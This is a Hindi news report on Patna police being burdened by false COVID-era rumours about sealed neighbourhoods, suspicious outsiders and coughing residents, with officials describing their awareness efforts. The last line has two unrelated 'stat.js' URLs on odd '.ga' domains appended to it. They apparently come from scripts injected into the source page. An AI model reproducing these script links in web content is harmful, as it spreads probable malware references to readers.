कोरोना के ख’तरों से खेलने वाली पुलिस अ’फवाहों से जूझ रही है। हर दिन कोई न कोई अ’फवाह उड़ती है और थानों की पुलिस को जूझना पड़ता है। कहीं किसी मोहल्ले में बाहर से आने वालों की सूचना दी जाती है तो कहीं संदिग्धों की सूचना दी जाती है। शुक्रवार को कंकड़बाग थाना क्षेत्र में कई मोहल्ले सील करने की अ’फवाह उड़ गई। पुलिस के पास फोन आने लगे, जबकि ऐसा कुछ हुआ ही नहीं था। पाटलिपुत्रा और बुद्धा कॉलोनी में भी ऐसे मामले सामने आए, जिनमें पुलिस को परेशान होना पड़ गया।

पुलिस लगातार कर रही जागरुक
पुलिस लगातार लोगों को जागरुक कर रही है। इसके बाद भी पटना के थानों की पुलिस को लगातार अ’फवाह से जूझना पड़ता है। थानाध्यक्षों का कहना है कि पुलिस सबसे अधिक सुलभ रहती है और जब मन में आता है लोग फोन घुमा देते हैं। अक्सर लोग यही कहते हैं कि आसपास कोई खांस रहा छींक रहा है। सूचना ऐसी भी दी जाती है कि कोई बाहर से आ गया है। पुलिस वालों का कहना है कि सूचना पर जब वह मौके पर पहुंचते हैं तो कहीं कुछ नहीं मिलता है। थानेदारों का कहना है कि कोई भी सूचना मिलती है तो उसे गंभीरता से लेना होता है। सूचना पाकर पुलिस मौके पर जाती है लेकिन कई सूचनाएं अ’फवाह होती है।

कई मोहल्लों से रोज आ रहीं शिकायतें
पटना के कई मोहल्ले तो ऐसे हैं जहां से रोज शिकायत आती है। कंकड़बाग, पाटलिपुत्रा, पटेलनगर, र्बोंरग रोड, आशियाना रोड और रुपसपुर एरिया से हर दिन कॉल आती है। कई ऐसे थाना क्षेत्र हें जहां अफ’वाहों की शिकायत अधिक है। पुलिस कार्रवाई भी नहीं कर रही है। डीजीपी गुप्तेश्वर पांडेय भी सोशल मीडिया के सहारे लोगों को जागरुक करने के साथ अ’फवाहों से बचने की सलाह दे रहे हैं। एसएसपी उपेंद्र कुमार शर्मा का कहना है कि अ’फवाहों से दूर रहने को लेकर लोगों को जागरुक किया जा रहा है। पुलिस भी हर क्षेत्र में लोगों को जागरुक करने में लगी है।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms